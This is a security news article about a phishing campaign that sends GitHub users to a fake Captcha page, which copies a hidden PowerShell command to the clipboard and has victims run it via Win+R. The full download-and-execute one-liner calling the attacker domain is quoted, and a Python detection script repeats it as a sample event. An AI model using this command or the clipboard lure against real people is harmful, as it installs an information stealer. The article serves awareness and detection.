Clever Social Engineering Attack Exploits Captchas to Target GitHub Users
A recent phishing attack is leveraging a unique twist to target GitHub users through a cleverly disguised Captcha page. This attack tricks developers into executing malicious scripts on their machines by masking it behind a seemingly harmless Captcha challenge.
The attack begins with an email that mimics GitHub's security team, claiming to have detected a vulnerability in the recipient’s repository. It instructs users to visit a fake website, "github-scanner[.]com", to resolve the issue. While GitHub does offer free security scans, users are typically directed to review results directly on GitHub’s platform, making the request to visit a third-party site suspicious.
The Fake Captcha
Upon visiting the malicious site, users are presented with what appears to be a standard "I'm not a robot" Captcha, a familiar interaction for most internet users. However, instead of solving a typical Captcha, users are presented with a more complex screen designed to trick them into running malicious code on their systems.
Hidden Payload in the Captcha Challenge
The website executes a JavaScript function that copies an exploit string to the user’s clipboard. The exploit is executed through a simple sequence: pressing "Windows+R" opens the Windows run dialog, prompting the victim to paste and run the malicious code without realizing its true intent.
The copied script appears harmless but actually runs a hidden PowerShell command:
```powershell
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content"
```
This command silently downloads and executes a secondary malicious file, "l6E.exe", a known information stealer identified as "Lumma Stealer."
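A detection-side illustration of the command shape described above, added here and not part of the original article: a small Python check that flags a Windows process-creation command line combining a hidden PowerShell window with evaluation of content fetched over the network. The log events are constructed samples, not real telemetry.

```python
import re

# Two traits of the one-liner shown above: a hidden window, and
# Invoke-Expression applied to the output of a web request.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
REMOTE_EVAL = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\b[^\"']*\b(?:iwr|invoke-webrequest|irm|invoke-restmethod)\b"
)
URL = re.compile(r"(?i)https?://[^\s'\"()]+")


def analyze_command_line(cmdline: str) -> dict:
    """Return a verdict for a single process command line."""
    lowered = cmdline.lower()
    is_powershell = "powershell" in lowered or "pwsh" in lowered
    hidden = bool(HIDDEN_WINDOW.search(cmdline))
    remote_eval = bool(REMOTE_EVAL.search(cmdline))
    urls = URL.findall(cmdline)
    return {
        "suspicious": is_powershell and hidden and remote_eval,
        "hidden_window": hidden,
        "remote_eval": remote_eval,
        "urls": urls,
    }


def flag_events(events):
    """events: iterable of (parent_image, command_line) pairs, as you would
    extract from Sysmon Event ID 1 or Windows 4688 records. Returns flagged ones."""
    findings = []
    for parent, cmd in events:
        verdict = analyze_command_line(cmd)
        if verdict["suspicious"]:
            findings.append({"parent": parent, "cmdline": cmd, **verdict})
    return findings


# Constructed sample events. A command pasted into the Run dialog is launched
# by explorer.exe, so that parent is what a Win+R-based lure would produce.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe",
     "powershell.exe -w hidden -Command \"iex (iwr 'https://github-scanner[.]com/download.txt').Content\""),
    ("C:\\Windows\\explorer.exe",
     "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Users\""),
    ("C:\\Program Files\\Git\\cmd\\git.exe",
     "powershell.exe -w hidden -File C:\\build\\post-checkout.ps1"),
]

if __name__ == "__main__":
    for f in flag_events(SAMPLE_EVENTS):
        print(f"[ALERT] parent={f['parent']} urls={f['urls']}\n        {f['cmdline']}")
```

Only the first sample is flagged: the hidden-window flag alone (third sample) is common in legitimate automation, so the check requires both traits together.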
Immediate Detection but Growing Risks
Though Microsoft Defender successfully identified and blocked the malicious "l6E.exe" file, this attack highlights a growing trend where infostealers increasingly target developers. The rapid rise of these social engineering tactics is a reminder of the importance of vigilance, particularly as these phishing schemes continue to evolve.
For now, the "github-scanner" domain is flagged by some anti-malware tools, but it hasn't yet been added to Google's Safe Browsing blocklist, increasing the risk for unprotected users.
As a reminder, always be cautious when receiving unsolicited emails, particularly those urging you to visit third-party websites. Verify all communications through official channels, and avoid executing any commands from untrusted sources.
Stay safe, and always be alert for phishing attempts that attempt to exploit even the smallest of details.